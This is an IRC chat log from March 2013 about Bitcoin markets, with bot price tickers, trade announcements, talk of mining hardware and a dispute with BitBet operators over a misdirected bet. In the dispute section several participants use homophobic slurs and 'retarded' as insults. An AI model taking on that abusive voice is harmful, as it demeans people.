yeah Mar 05 10:12:54 and name them bitfountain Mar 05 10:14:35 Choochoo Mar 05 10:14:44 bitfountian is asicminer? Mar 05 10:14:51 or avalon? Mar 05 10:14:58 asicminer Mar 05 10:14:59 asicminer Mar 05 10:15:12 gah my Avalon 2 looks outdated Mar 05 10:15:13 lol Mar 05 10:15:27 i assume that first annon must be asicminer as well Mar 05 10:15:49 i bet these are racks that are ready to go and fully done Mar 05 10:15:54 the big anon is just testing... Mar 05 10:16:01 tgheory is the anon guy is primeasic Mar 05 10:16:38 still only 3.5 TH hmmm Mar 05 10:17:26 [MPEX] [S.MPOE] 700 @ 0.00073421 = 0.5139 BTC [+] Mar 05 10:19:17 trollcointalk.org down for you guys? Mar 05 10:20:34 did not asicminer mine on some other pool than oz?? Mar 05 10:21:46 btcguild Mar 05 10:22:41 hmm ill see waht they ahve there Mar 05 10:22:54 [MPEX] [S.DICE] 400 @ 0.0051 = 2.04 BTC [-] Mar 05 10:23:13 oh shit they ahve 3.8 there too Mar 05 10:23:28 so maybe 7.2 th/s nice Mar 05 10:27:47 ;;asks 39 Mar 05 10:27:52 There are currently 511.39728 bitcoins offered at or under 39.0 USD, worth 19944.4939902 USD in total. | Data vintage: 0.0013 seconds Mar 05 10:29:16 [BTCTC] [BASIC-MINING] 2 @ 0.34499 = 0.69 BTC [+] **** BEGIN LOGGING AT Tue Mar 5 11:52:30 2013 Mar 05 11:54:44 ;;ticker Mar 05 11:54:44 BTCUSD ticker | Best bid: 39.03475, Best ask: 39.05000, Bid-ask spread: 0.01525, Last trade: 39.05000, 24 hour volume: 75308.05560655, 24 hour low: 34.76100, 24 hour high: 40.64625, 24 hour vwap: 37.27642 Mar 05 12:04:26 yup, crazy Mar 05 12:04:54 dont forget u guys can get 5 btc for 100 dollars Mar 05 12:05:21 Bowjob where? Mar 05 12:05:25 [MPEX] [S.DICE] 420 @ 0.00577 = 2.4234 BTC [+] Mar 05 12:05:37 https://bitcointalk.org/index.php?topic=149244.0 Mar 05 12:06:14 pretty sure that there's no more btc sent Mar 05 12:06:41 " Mar 05 12:06:41 !!! BUT !!! Mar 05 12:06:41 when this limit (overall 250 btc) is reached i will have to stop. SO IF YOU WANT TO DONATE ONLY IF YOU ARE GETTING BTC IN RETURN PLEASE, PLEASE wait some time until i go through all the donations made already an state how much btc i've got left to give away (if any)**" Mar 05 12:07:39 100 btc left Mar 05 12:09:36 oh cool he's still onlne Mar 05 12:11:03 [HAVELOCK] [HIM] 2 @ 1.65 = 3.3 BTC [+] Mar 05 12:12:27 Bowjob, looks like a huge queue Mar 05 12:12:32 ;;ticker Mar 05 12:12:33 BTCUSD ticker | Best bid: 39.04000, Best ask: 39.26886, Bid-ask spread: 0.22886, Last trade: 39.26886, 24 hour volume: 76899.63793808, 24 hour low: 34.77000, 24 hour high: 40.64625, 24 hour vwap: 37.33416 Mar 05 12:12:41 well the worst that can happen is you donate to a good cause Mar 05 12:12:51 i donated to khanacademy, will write a letter Mar 05 12:12:57 that would help btc a lot Mar 05 12:15:03 TF Mar 05 12:15:12 make sure you send him an unaltered PM Mar 05 12:15:16 with your reciept Mar 05 12:15:19 dont block anything Mar 05 12:17:26 Bowjob, yeah, it's not like I wasted $100 :) Mar 05 12:18:26 http://lurkerfaqs.com/boards/400-current-events/64857965/ Mar 05 12:18:37 I tried to gave away 1 bitcoin.. but i just go snubbed Mar 05 12:18:38 lol Mar 05 12:18:43 *got Mar 05 12:20:32 [MPEX] [S.DICE] 1120 @ 0.0050999 = 5.7119 BTC [-] Mar 05 12:22:00 someone still dumping s.dice :P Mar 05 12:22:55 someone could always donate more btc to the guy so he has more to give away :) Mar 05 12:22:55 [MPEX] [S.MPOE] 5065 @ 0.00073421 = 3.7188 BTC [+] Mar 05 12:22:56 [MPEX] [S.MPOE] 3429 @ 0.00073821 = 2.5313 BTC [+] Mar 05 12:24:19 quick count, 48 bitcointip tips in that thread, they're not all for 5 btc but most of them are, so it's close to 250 max Mar 05 12:25:21 I got in at least Mar 05 12:27:29 bit14, don't forget PM Mar 05 12:27:42 http://trilema.com/2013/primeasic-most-likely-a-scam/ Mar 05 12:27:53 mircea_popescu, was that a surprise? Mar 05 12:28:21 scam eh Mar 05 12:28:32 lookit. i wanted to go to hungary too lol Mar 05 12:28:39 TradeFortress well, checking things out beats guessing you know Mar 05 12:29:11 sounded fishy from the first post Mar 05 12:29:50 indeed. Mar 05 12:30:06 so did everyone else, including asicminer, avalon, etc. **** BEGIN LOGGING AT Tue Mar 5 17:43:18 2013 Mar 05 17:45:02 shouldn't you be paying off debts before btc hits 100 Mar 05 17:45:54 apparently your shareholders havent been fully paid Mar 05 17:46:13 :D Mar 05 17:46:44 hoorah Mar 05 17:47:02 brendio is awol? Mar 05 17:47:03 [HAVELOCK] [SDICE] 2 @ 0.5851 = 1.1702 BTC [-] Mar 05 17:47:07 ;;market sell 10000 Mar 05 17:47:12 A market order to sell 10000 bitcoins right now would net 384135.5818 USD and would take the last price down to 37.2500 USD, resulting in an average price of 38.4136 USD/BTC. | Data vintage: 0.0011 seconds Mar 05 17:47:23 ;;market sell 100000 Mar 05 17:47:24 A market order to sell 100000 bitcoins right now would net 2863474.6369 USD and would take the last price down to 16.1000 USD, resulting in an average price of 28.6347 USD/BTC. | Data vintage: 11.8681 seconds Mar 05 17:47:30 usagi really? Mar 05 17:47:33 ;;market sell 1000000 Mar 05 17:47:33 A market order to sell 1000000 bitcoins right now would net 4128657.4952 USD and would take the last price down to 0.0100 USD, resulting in an average price of 4.1287 USD/BTC. | Data vintage: 21.4781 seconds Mar 05 17:48:04 usagi pirate bond? Mar 05 17:48:31 you dont think pirate will pay bak? Mar 05 17:48:45 oh Mar 05 17:48:51 mining bond Mar 05 17:49:04 what did nefario say? Mar 05 17:49:08 oh goodness the bubble at 42 will collapse significantly when a large horde goes to dump coins Mar 05 17:49:15 miners have mercy Mar 05 17:49:19 we hit 42? Mar 05 17:49:21 ;;ticker Mar 05 17:49:22 BTCUSD ticker | Best bid: 40.00000, Best ask: 40.10000, Bid-ask spread: 0.10000, Last trade: 40.00000, 24 hour volume: 87145.55081638, 24 hour low: 35.12102, 24 hour high: 40.64625, 24 hour vwap: 38.30823 Mar 05 17:49:26 nefario was last seen in #bitcoin-assets 23 weeks, 0 days, 19 hours, 49 minutes, and 31 seconds ago: Those assets are not listed or traded anymore Mar 05 17:49:44 ;;ticker Mar 05 17:49:44 BTCUSD ticker | Best bid: 40.00000, Best ask: 40.10000, Bid-ask spread: 0.10000, Last trade: 40.00000, 24 hour volume: 87145.55081638, 24 hour low: 35.12102, 24 hour high: 40.64625, 24 hour vwap: 38.30823 Mar 05 17:49:53 o, not 50 yet ? okay. Mar 05 17:50:06 usagi he sold you them, talk to him, what can i do? Mar 05 17:50:09 50 is too high to sustain Mar 05 17:52:21 ok its me. Mar 05 17:53:53 which loads in the same minute. Mar 05 17:54:40 usagi i know he stole shares... Mar 05 17:55:05 do you guys think the dow is correlated at all to bitcoin? Mar 05 17:55:25 so visa just signed huge chase deal Mar 05 17:55:26 usagi i dont doubt you, but legally what can i do? Mar 05 17:55:36 more traction than all bitcoin's historical cummulative. Mar 05 17:55:43 if i pay you my suit is void Mar 05 17:56:21 goog at 835 Mar 05 17:57:02 boob at a boob Mar 05 17:59:49 mp, can you proces deadterra's withdrawal so we can get our divs? Mar 05 18:00:31 yep Mar 05 18:00:36 thank you sir Mar 05 18:02:47 ;;bcauth Mar 05 18:02:47 (bcauth ) -- Initiate authentication for user . You must have registered with the bot with a bitcoin address for this to work. You will be given a random passphrase to sign with your address, and submit to the bot with the 'bcverify' command. Your passphrase will expire within 10 minutes. Mar 05 18:03:22 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1299 BTC [+] Mar 05 18:04:12 :) Mar 05 18:06:06 hey d3 surprize 40$ Mar 05 18:06:19 lol Mar 05 18:06:21 Chaang-Noi: huh? Mar 05 18:06:27 hi Mar 05 18:06:41 hi Mar 05 18:09:08 mp, deadterra is trying to talk to you i think Mar 05 18:09:18 says he's on ignore? Mar 05 18:09:40 he says sorry it was his fault he forgot to make the withdrawal Mar 05 18:10:33 mp lol are we 5? :) Mar 05 18:10:54 dead t is a solid guy Mar 05 18:11:12 he got on my ignore months ago for being the fuck out of line. then ppl intervened cause oh, he's a good guy etc, he did it again within like... a day. Mar 05 18:11:32 he can be all solid he wants, but much like gigavps he got to get it in his skull that the hierarchy is on the ground not in his imagination. Mar 05 18:11:35 yeah what did he do? Mar 05 18:11:52 iirc arguing with me about how solid & trustworthy nefario is. Mar 05 18:12:27 ill say there is no proof pirate is a ponzi :) Mar 05 18:12:48 im shocked im not on mps ignore... Mar 05 18:13:07 ;;ticker Mar 05 18:13:08 BTCUSD ticker | Best bid: 40.00101, Best ask: 40.07000, Bid-ask spread: 0.06899, Last trade: 40.07000, 24 hour volume: 89799.91641713, 24 hour low: 35.20000, 24 hour high: 40.64625, 24 hour vwap: 38.39301 Mar 05 18:15:34 Chaang-Noi you're too cowardly to actually make it. Mar 05 18:15:39 Unknown arg 'none' ignored. Mar 05 18:15:39 Usage: IGNORE mask - host mask to ignore, eg: *!*@*.aol.com types - types of data to ignore, one or all of: PRIV, CHAN, NOTI, CTCP, DCC, INVI, ALL options - NOSAVE, QUIET Mar 05 18:16:11 DeaDTerra don't blow it. Mar 05 18:16:16 did MP indirectly say I have balls? Mar 05 18:16:37 Yay I guess :p Mar 05 18:16:43 and he said im a pussy lol Mar 05 18:16:58 hahah xD Mar 05 18:17:09 he is still trying for my business i guess poor fail mp Mar 05 18:17:17 I guess you can't have balls and not be ignored at the same time, you have to chose :P Mar 05 18:17:54 i guess he knew from the start i thought mp was fail so never was shocked when i rejected his fail Mar 05 18:18:13 lol Mar 05 18:18:19 mp.. what a sad clown... Mar 05 18:19:33 !ticker m s.mpoe Mar 05 18:19:34 [MPEX:S.MPOE] 1D: 0.00072612 / 0.00075028 / 0.00078628 (2480324 shares, 1,860.96 BTC), 7D: 0.0007147 / 0.00075192 / 0.00078628 (3500340 shares, 2,631.98 BTC), 30D: 0.0006153 / 0.00067771 / 0.00078628 (61872804 shares, 41,932.14 BTC) Mar 05 18:20:10 in b 4 mod6 is mp Mar 05 18:20:35 ;asks 45 Mar 05 18:21:18 withdraw on it's way :D Mar 05 18:21:24 dividends will come in about 12 confirms Mar 05 18:21:47 cool Mar 05 18:21:53 ;;asks 45 Mar 05 18:21:58 There are currently 11532.914 bitcoins offered at or under 45.0 USD, worth 482883.431677 USD in total. | Data vintage: 0.0022 seconds Mar 05 18:21:58 thanks mp <3 Mar 05 18:22:56 :) Mar 05 18:24:51 What's up with bitinstant? Anyone got the inside word? Mar 05 18:25:51 B0g4r7_ what's the issue tho ? Mar 05 18:26:12 Why is the sendto address on my wager wrong? Mar 05 18:26:23 i do find it odd bitinstant is down... Mar 05 18:26:25 That's what I'm trying to find out. They've been down for days now. Mar 05 18:26:47 "BitInstant.com is currently down due to site revisions." "We apologize for the downtime. BitInstant will be back online after the weekend." Mar 05 18:27:09 I think this calls for a bet on whether they will resurface. Mar 05 18:27:24 ...that someone else will write and post Mar 05 18:27:39 hmm Mar 05 18:27:42 B0g4r7_ i had no idea Mar 05 18:27:53 ppl on btc-e are not happy. Mar 05 18:27:55 JimRogers which wager is that ? Mar 05 18:28:06 not being able to get funds in. Mar 05 18:28:22 http://bitbet.us/bet/283/btc-usd-at-mtgox-will-hit-50-in-march/ Mar 05 18:28:32 05-03-13 08:30 Yes 97`003 1.00000000 16fUs / 13rnD Mar 05 18:28:39 not the "Send To" address i put Mar 05 18:28:42 but the exact amount bet Mar 05 18:28:44 and the timing is right Mar 05 18:28:46 so what the fuck? Mar 05 18:29:10 i've placed multiple bets successfully Mar 05 18:29:12 JimRogers now that's a good question. do you have autocomplete or anything else on the browser side messing up your bets ? Mar 05 18:29:17 this one seemed to have gotten fucked up Mar 05 18:29:19 nope Mar 05 18:29:21 That would suck. Mar 05 18:29:21 a guy earlier had his browser autopick no whether he clicked yes or no Mar 05 18:29:26 i have placed 9 wagers successfully Mar 05 18:29:45 is the address wrong as in, not the one you intended to use or wrong as in, never seen it before ? Mar 05 18:30:52 wrong, as in, no the "Send To" address i have used numerous times Mar 05 18:30:58 and intended for this wager Mar 05 18:31:02 and pasted into the box Mar 05 18:32:43 are my coins gone? Mar 05 18:32:50 likely ;/ Mar 05 18:33:27 kakobrekla's looking into it tho Mar 05 18:35:12 mp are you conected to that site in anyway other than a user? Mar 05 18:35:29 "that site" ? bitbet you mean ? Mar 05 18:35:35 yup Mar 05 18:35:46 Owner : Matic "kakobrekla" Kočevar and Mircea "mircea_popescu" Popescu Mar 05 18:35:54 says so right on teh asset page http://mpex.co/?mpsic=S.BBET Mar 05 18:36:05 i dont use mpex Mar 05 18:36:22 and no longer bitbet lol Mar 05 18:36:36 has anyone else had their bits go to a random Send To address Mar 05 18:36:39 I demand my money back Mar 05 18:36:47 JimRogers it's totally a new one. Mar 05 18:37:05 i doubt mp scammed you, fucked up mabe... Mar 05 18:37:16 thats not the address i entered into the Send To Mar 05 18:39:03 write I'm done wit this fucking website scam Mar 05 18:39:05 stealing my bitcoin Mar 05 18:39:07 gay ass coding Mar 05 18:39:10 unreliable Mar 05 18:39:16 other ppl having same problem? Mar 05 18:39:27 you are the only one. Mar 05 18:39:40 I only started using bitbet yesterday. Mar 05 18:39:59 I guess I could check the send-to address if I were in front of that wallet. Mar 05 18:40:27 But I'm not. Mar 05 18:40:52 what he quit ? Mar 05 18:40:56 wtf is wrong with people ;/ Mar 05 18:41:00 emoquit Mar 05 18:41:16 incidentally! the address he paid his 1 btc to is 16fUs2yD4xLyxYy6863SMX3PP8Lw1xvZog Mar 05 18:41:25 https://blockchain.info/address/16fUs2yD4xLyxYy6863SMX3PP8Lw1xvZog that's the tx Mar 05 18:41:30 he paid from 1M1Ugbk2P2L3ekZPESywAyfF5aeZ3wNi5d Mar 05 18:41:41 if you look at taint analysis on that https://blockchain.info/taint/1M1Ugbk2P2L3ekZPESywAyfF5aeZ3wNi5d Mar 05 18:42:02 huh? Mar 05 18:42:09 should i send some coin to the address and see if i get it? Mar 05 18:43:06 the address the payout goes to (13rnDnrH8zBAkNpxXFEyphj3EFcvDKd9Ws) is there : 18.5851316787% Mar 05 18:43:24 well, there's relation between the two addresses, it didn't pop out of randomness Mar 05 18:43:26 maybe it's yours ? Mar 05 18:43:35 i don't understand the taint analysis Mar 05 18:43:45 what can i do to see if those funds will end up in one of my accounts Mar 05 18:43:48 it looks through the blockchain to see if two addresses are related. Mar 05 18:44:02 send a 0.001 btc or w/e small dust to it see ? Mar 05 18:44:55 it's somewhat improbable the two addies got 8 txs in between themselves and yet they're totally unrelated. Mar 05 18:45:23 i don't understand the second sentence Mar 05 18:45:28 which two addresses Mar 05 18:45:30 13rnDnrH8zBAkNpxXFEyphj3EFcvDKd9Ws Mar 05 18:45:37 the address you paid from, and the address that's listed as beneficiary Mar 05 18:45:39 is the one the gay ass website says "send to" Mar 05 18:45:40 are not strangers. Mar 05 18:45:52 i sent it from sealswithclubs Mar 05 18:46:06 the send to is gonna fuck me huh? Mar 05 18:47:00 so you don't control the sending address ? Mar 05 18:47:14 bah how is one ot talk with people that keep leaving. Mar 05 18:47:16 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1326 BTC [+] Mar 05 18:47:16 he is parting and joining Mar 05 18:47:17 so you don't control the sending address ? << Mar 05 18:47:18 [BTCTC] [BTC-TRADING-PT] 1 @ 0.13717 BTC [+] Mar 05 18:47:18 JimRogers: well, the only thing i can really say is you pasted an address (which you also say you did), bitbet did no further processing as in establishing the return address. what you pasted is in the db. whats in the db is on the site. but i can do one thing - add your payout destination notification at the last step if that would help to prevent any mistakes in the future. Mar 05 18:47:21 [BTCTC] [BTC-TRADING-PT] 18 @ 0.1372 = 2.4696 BTC [+] Mar 05 18:47:24 i am not trying to leave Mar 05 18:47:50 kay. Mar 05 18:47:54 i sent a micropayment to that address Mar 05 18:47:59 hopefully it ends up in one of my accounts Mar 05 18:48:03 [HAVELOCK] [SDICE] 6 @ 0.59 = 3.54 BTC [+] Mar 05 18:48:08 this fucking website is lacking serious functionality Mar 05 18:48:24 what functionality would that be ? Mar 05 18:48:37 https://blockchain.info/tx/1d65ace8daa117bcd97fe7bff9672e8e5c174aba8ab7d0217694f3cf55c4afea .001337 Mar 05 18:48:43 does it show in your wallet ? Mar 05 18:49:49 Maybe you clicked on "send to originating address" accidentally and then clicked SUBMIT. Mar 05 18:49:59 nope Mar 05 18:50:14 nah cause it's not listed as the orig addy. Mar 05 18:50:24 mmm Mar 05 18:50:42 It would be nice if the "Send bitcoins to fund the bet" screen showed the chosen payout address. Mar 05 18:50:50 this fucking website needs account history Mar 05 18:50:52 or something Mar 05 18:50:54 to track bets Mar 05 18:51:03 use your bitcoin addy Mar 05 18:51:10 this website just ate my bitcoin Mar 05 18:51:16 i put the correct "Send To" address in Mar 05 18:51:25 and then sent a bitcoin to the supplied addy Mar 05 18:51:33 your website registered the bet, but put a different send to Mar 05 18:51:39 thats functionality that sucks Mar 05 18:51:41 JimRogers the problem here is this : you state what you did, but we have no way of knowing it's true or false Mar 05 18:51:48 i get that Mar 05 18:51:50 17:47.17 ( kakobrekla ) JimRogers: well, the only thing i can really say is you pasted an address (which you also say you did), bitbet did no further processing as in establishing the return address. what you posted is in the db. whats in the db is on the site. but i can do one thing - add your payout destination notification at the last step if that would help to prevent any mistakes Mar 05 18:51:50 in the future. Mar 05 18:51:55 the two addresses are related, and you just declared you don't control the originating address Mar 05 18:52:07 this is very difficult to resolve because it's basically no leads Mar 05 18:52:17 gay Mar 05 18:52:18 gay Mar 05 18:52:19 gay Mar 05 18:52:26 your website put the wrong send to Mar 05 18:52:30 why would i put that addy Mar 05 18:52:41 spaz Mar 05 18:52:44 lol totally. Mar 05 18:53:10 How much was the bet for? Mar 05 18:53:17 1 Mar 05 18:53:34 Why don't people check their inputs before submitting? Mar 05 18:53:51 why does it keep kicking me Mar 05 18:53:55 1AKeAYxjfcdQeGMtKTma9gsRG2i1dgMxtN Mar 05 18:53:57 i have no idea. Mar 05 18:54:01 It's not us, it's you. Mar 05 18:54:05 most likely. Mar 05 18:54:07 Says you've left the channel. Mar 05 18:54:11 JimRogers : run a virus scanner ? Mar 05 18:54:15 you might have a trojan or something. Mar 05 18:54:21 Stop closing the window or whatever you're doing. Mar 05 18:54:22 1AKeAYxjfcdQeGMtKTma9gsRG2i1dgMxtN Mar 05 18:54:29 was the bitcoin address i sent the money to Mar 05 18:54:33 only i would have access to that Mar 05 18:54:34 right? Mar 05 18:54:41 so give me my coins back Mar 05 18:54:45 or set the send to to the right addy Mar 05 18:55:03 Are you sure someone doesn't have remote control of your PC? Mar 05 18:55:11 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 05 18:55:32 idk why your client would randomly leave the channel. Mar 05 18:55:45 JimRogers srsly, run a scanner. Mar 05 18:55:55 [MPEX] [S.DICE] 149 @ 0.00528554 = 0.7875 BTC [+] Mar 05 18:55:55 well heres a new wrinkly Mar 05 18:56:01 it seems the addy 1AKeAYxjfcdQeGMtKTma9gsRG2i1dgMxtN Mar 05 18:56:04 never received it Mar 05 18:56:15 received what ?! Mar 05 18:56:22 1AKeAYxjfcdQeGMtKTma9gsRG2i1dgMxtN Mar 05 18:56:29 was the addy bit bet supplied as the bet destination address Mar 05 18:56:35 seals with clubs sent 1 bitcoin to 1AKeAYxjfcdQeGMtKTma9gsRG2i1dgMxtN Mar 05 18:56:43 the block chain doesn't recognize the transfer Mar 05 18:57:18 So maybe you're seeing a bet that's not yours, and yours still is not confirmed? Mar 05 18:57:18 uhm Mar 05 18:57:24 thats possible Mar 05 18:57:27 well then ?! Mar 05 18:57:36 seals claims to have sent last night Mar 05 18:57:36 It took a while for my bets to confirm. Mar 05 18:57:43 (sent from local wallet) Mar 05 18:57:48 this is just ridonculus. Mar 05 18:57:59 Take it up w/ Seals. If it's not in the blockchain, they didn't send. Mar 05 18:58:20 Seals with Scams Mar 05 18:58:27 In the future, I advise always sending from a local wallet. Mar 05 18:58:32 im sorry im just sleep deprived. Mar 05 18:59:36 [MPEX] [S.DICE] 1851 @ 0.00528554 = 9.7835 BTC [+] Mar 05 18:59:37 [MPEX] [S.DICE] 649 @ 0.0055 = 3.5695 BTC [+] Mar 05 19:00:04 [HAVELOCK] [SDICE] 13 @ 0.59 = 7.67 BTC [+] Mar 05 19:00:04 [HAVELOCK] [SDICE] 5 @ 0.5817 = 2.9085 BTC [-] Mar 05 19:00:06 [HAVELOCK] [SDICE] 7 @ 0.5815 = 4.0705 BTC [-] Mar 05 19:00:56 Showing the payout address on the bet confirmation/funding screen would be nice to have. Mar 05 19:01:08 Would help avoid mistakes. Mar 05 19:01:10 ill add that. Mar 05 19:01:13 thx. Mar 05 19:01:19 not that many mistakes were made Mar 05 19:01:24 maybe in total 1? Mar 05 19:01:48 i didn't make a mistake Mar 05 19:01:49 That's good. If that can be reduced to 0.1, even better. Mar 05 19:01:53 i have records of everything i have done Mar 05 19:01:58 either your guys system fucked up Mar 05 19:02:01 with over 2k bets placed - yeah its preety good Mar 05 19:02:02 [HAVELOCK] [SDICE] 9 @ 0.5815 = 5.2335 BTC [-] Mar 05 19:02:07 Your mistake was in thinking the listed bet was yours. Mar 05 19:02:19 or seals is claiming a cash out happened that never happened, coincidentally at the same timing and same amount as what i sent Mar 05 19:02:58 1.0 BTC is not exactly a unique bet amount. Mar 05 19:02:59 ... Mar 05 19:03:03 [HAVELOCK] [SDICE] 1 @ 0.5809 BTC [-] Mar 05 19:03:07 good point Mar 05 19:03:18 JimRogers if its not in a blockchain on the correct address Mar 05 19:03:24 what do you expect bitbet to do Mar 05 19:03:28 guess? Mar 05 19:03:31 bit bet aint doing shit Mar 05 19:03:32 i get it Mar 05 19:03:37 i get how this bitcoin world work Mar 05 19:03:38 works Mar 05 19:03:40 dog eat dog Mar 05 19:04:26 also, if addy is not used in 24hrs is not active anymore Mar 05 19:04:30 i might remove that now Mar 05 19:04:38 since the last bitcoind upgrade Mar 05 19:04:39 wait Mar 05 19:04:40 wait wait Mar 05 19:04:52 so you can confirm that 1AKeAYxjfcdQeGMtKTma9gsRG2i1dgMxtN Mar 05 19:04:55 was a bitbet addy Mar 05 19:05:28 yes, requested as a bet on betid 283 Mar 05 19:05:47 right Mar 05 19:05:49 that's me Mar 05 19:05:54 sure Mar 05 19:05:54 and seals claims to have sent it to that addy Mar 05 19:06:00 that address is empty Mar 05 19:06:00 i guess they lie? Mar 05 19:06:09 yeah, 0 tx's for that address Mar 05 19:06:11 2013-03-04 23:31 1 BTC 1AKeAYxjfcdQeGMtKTma9gsRG2i1dgMxtN Mar 05 19:06:12 Nothing was ever sent to http://blockchain.info/address/1AKeAYxjfcdQeGMtKTma9gsRG2i1dgMxtN Mar 05 19:06:15 directly from seals backend Mar 05 19:06:17 yea i get you Mar 05 19:06:19 thanks for the help Mar 05 19:06:21 i emailed seals Mar 05 19:06:29 and if i lose the money i won't fault you guys Mar 05 19:06:35 but the site could still use much more functionality Mar 05 19:06:44 and perhaps binary options, instead of this weird time weighting bullshit Mar 05 19:07:05 keep getting kicked out Mar 05 19:07:06 Srsly, consider a local wallet. You should be using one anyway. Mar 05 19:07:16 thats also a good suggestion Mar 05 19:07:19 i won't do it this way again Mar 05 19:08:15 Colloquy on OS X huh. I use that at home and don't have that issue. I run version 2.3 tho, which I think is a lot different. Mar 05 19:08:49 i moved the 24hrs limit to 3 days now Mar 05 19:09:06 so you have 3 days to send the bet in since the time you requested an address Mar 05 19:09:16 once first bet is in - addy is kept active until the bet is over Mar 05 19:09:18 [BTCTC] [BTC-TRADING-PT] 82 @ 0.1372 = 11.2504 BTC [+] Mar 05 19:09:20 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1379 BTC [+] Mar 05 19:09:21 so you can use the same one Mar 05 19:09:22 [BTCTC] [BTC-TRADING-PT] 1 @ 0.13997 BTC [+] Mar 05 19:09:24 [BTCTC] [BTC-TRADING-PT] 1 @ 0.156 BTC [+] Mar 05 19:09:26 and it will use same settings Mar 05 19:09:26 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1599 BTC [+] Mar 05 19:09:28 [BTCTC] [BTC-TRADING-PT] 1 @ 0.16 BTC [+] Mar 05 19:09:32 just weight will be different Mar 05 19:09:33 mkay? Mar 05 19:09:39 Hm, that's handy. Mar 05 19:09:46 its how it works. Mar 05 19:10:09 What happens if I bet .01 BTC, and then days later, after betting is closed, I send another 5 BTC? Mar 05 19:10:28 you made a 5 btc mistake. Mar 05 19:10:39 you tipped kakobrekla Mar 05 19:10:39 :nom nom nom: Mar 05 19:10:58 well you tipped mircea Mar 05 19:11:12 but i will scan the blockchain to findout how much he is getting and take half. Mar 05 19:11:20 muahaha Mar 05 19:11:20 lol... at least it should be added to dividends, like mpex mispayments Mar 05 19:11:37 yeah Mar 05 19:11:40 prolly Mar 05 19:11:48 would be the smart thing to do Mar 05 19:12:08 Earlier I made a whole new "bet", when I could have just sent more to the same address. Mar 05 19:12:19 yes Mar 05 19:12:24 what a waste of time and resources Mar 05 19:12:46 totally Mar 05 19:12:52 and his conclusion, he generously won't blame us guys Mar 05 19:12:58 but the site could still use much more functionality Mar 05 19:13:00 i get it. Mar 05 19:13:06 totally posting this one, too. Mar 05 19:13:51 so i can add to a bet for someone else, causing confusion and else >:D Mar 05 19:14:10 jurov you cause confusion mostly for yourself, bitbet will just pay him Mar 05 19:14:33 ok hopefully sealswithclubs can help me understand what happened to my coin Mar 05 19:15:04 [BTCTC] [BTC-TRADING-PT] 91 @ 0.1647 = 14.9877 BTC [+] Mar 05 19:15:15 do they have an IRC room with helpful ppl ilk eyou guys? Mar 05 19:15:30 JimRogers not afaik, bitbet is one of the few gay sites that do Mar 05 19:15:35 [BTCTC] [BTC-TRADING-PT] 9 @ 0.1647 = 1.4823 BTC [+] Mar 05 19:16:48 You'll have to PM Micon, or use their "contact" email. Mar 05 19:16:52 you outed bitbet Mar 05 19:17:53 i didn't know bitbet was gay? Mar 05 19:18:03 [HAVELOCK] [HIM] 1 @ 1.6499 BTC [-] Mar 05 19:18:03 all the good bitcoin sites are apparently Mar 05 19:18:14 am i missing the pr0n? Mar 05 19:18:20 mpex is straight as a falopian tube Mar 05 19:18:20 GAY PORN HARD Mar 05 19:18:34 If you look, you'll see that most of the bets are more pink than blue. Definitely gay. Mar 05 19:18:40 aight Mar 05 19:18:43 lavender Mar 05 19:19:02 don't know how i missed it before Mar 05 19:19:40 ;;ticker Mar 05 19:19:41 BTCUSD ticker | Best bid: 40.04000, Best ask: 40.05995, Bid-ask spread: 0.01995, Last trade: 40.04000, 24 hour volume: 85295.59320849, 24 hour low: 35.99900, 24 hour high: 40.64625, 24 hour vwap: 38.66891 Mar 05 19:19:59 the whole weighting system is retarded Mar 05 19:20:04 if you guys did binary futures Mar 05 19:20:07 you could buy/sell bets Mar 05 19:20:12 but instead your dumb Mar 05 19:20:29 don't talk about mp's weighting Mar 05 19:22:36 which time zone are the time stamps on the website? Mar 05 19:23:08 UTC Mar 05 19:24:01 and I'm sure someone will someday start betting site with binary futures Mar 05 19:24:21 if it was binary would it just be like 50`000 per side? Mar 05 19:24:47 I'm trying to Mar 05 19:24:48 kakobrekla, bit it isn't a bad ide to make the bets resellable Mar 05 19:24:55 u fags need to pay me Mar 05 19:25:03 give me the money back someone stole Mar 05 19:25:22 stfu Mar 05 19:25:25 if you submit request with payout addy signature, you can chenge it Mar 05 19:25:52 thus effectively selling the bet Mar 05 19:27:25 wait what ?! Mar 05 19:27:30 jurov ? Mar 05 19:27:41 just my proposal Mar 05 19:28:41 Seems like an interesting idea. Mar 05 19:29:31 wait, isn't the weighting just a time based thing -- so if you want to "sell your bet" to a third party, it still doesn't change the time when the wager was placed. Mar 05 19:29:44 thats why this website is fucking gay Mar 05 19:29:45 jurov i don't understand it tho. explain it to me like i'm JimRogers Mar 05 19:29:46 needs to do binary Mar 05 19:29:48 to hace liquidity Mar 05 19:29:53 0-100 Mar 05 19:29:58 idk how you'd implement it tho. Mar 05 19:30:00 buy-sell whatever reality dictates Mar 05 19:30:09 JimRogers: bowties are gay. Mar 05 19:30:19 you can start by finding my money that was stolen Mar 05 19:30:23 JimRogers are you the guy discussed in this article : http://trilema.com/2013/least-likely-to-succeed-character-the-upseller/ ? Mar 05 19:30:27 [MPEX] [S.MPOE] 8500 @ 0.00074914 = 6.3677 BTC [+] Mar 05 19:30:29 [MPEX] [S.MPOE] 1500 @ 0.00074999 = 1.125 BTC [+] Mar 05 19:30:49 [MPEX] [S.MPOE] 5850 @ 0.00074999 = 4.3874 BTC [+] Mar 05 19:30:50 [MPEX] [S.MPOE] 604 @ 0.00075 = 0.453 BTC [+] Mar 05 19:30:53 nope not me Mar 05 19:31:30 right. Mar 05 19:31:39 [MPEX] [S.MPOE] 1000 @ 0.00075 = 0.75 BTC [+] Mar 05 19:31:43 mircea_popescu say you made bet with 99999 weight but you want the moeny now not wait Mar 05 19:31:44 well, the reasons bitbet does betting correctly, rather than what you propose, are discussed there. Mar 05 19:31:48 jurov yes Mar 05 19:31:51 not even reading all that bullshit as its too long Mar 05 19:31:54 and written retardely Mar 05 19:32:00 i see. Mar 05 19:32:02 lol Mar 05 19:32:06 I'm not proposing changing ur ways Mar 05 19:32:07 so you find someone who wants it, you'll sign the request with existing payout address Mar 05 19:32:07 im saying Mar 05 19:32:10 ur ways are retarded Mar 05 19:32:16 Binary Futures are thousands of years old Mar 05 19:32:16 and submit it to bitbet with new payout address Mar 05 19:32:20 you want him to change it, and you won't bother to read on how it works. clever. Mar 05 19:32:25 so the bet will now pay to the buyer Mar 05 19:32:27 